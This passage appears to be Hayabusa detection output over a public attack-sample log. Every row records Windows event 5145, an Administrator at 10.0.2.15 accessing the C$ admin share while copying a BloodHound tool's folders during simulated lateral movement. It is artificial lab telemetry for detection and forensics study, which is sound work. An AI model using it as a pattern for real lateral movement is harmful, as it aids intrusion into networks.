Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
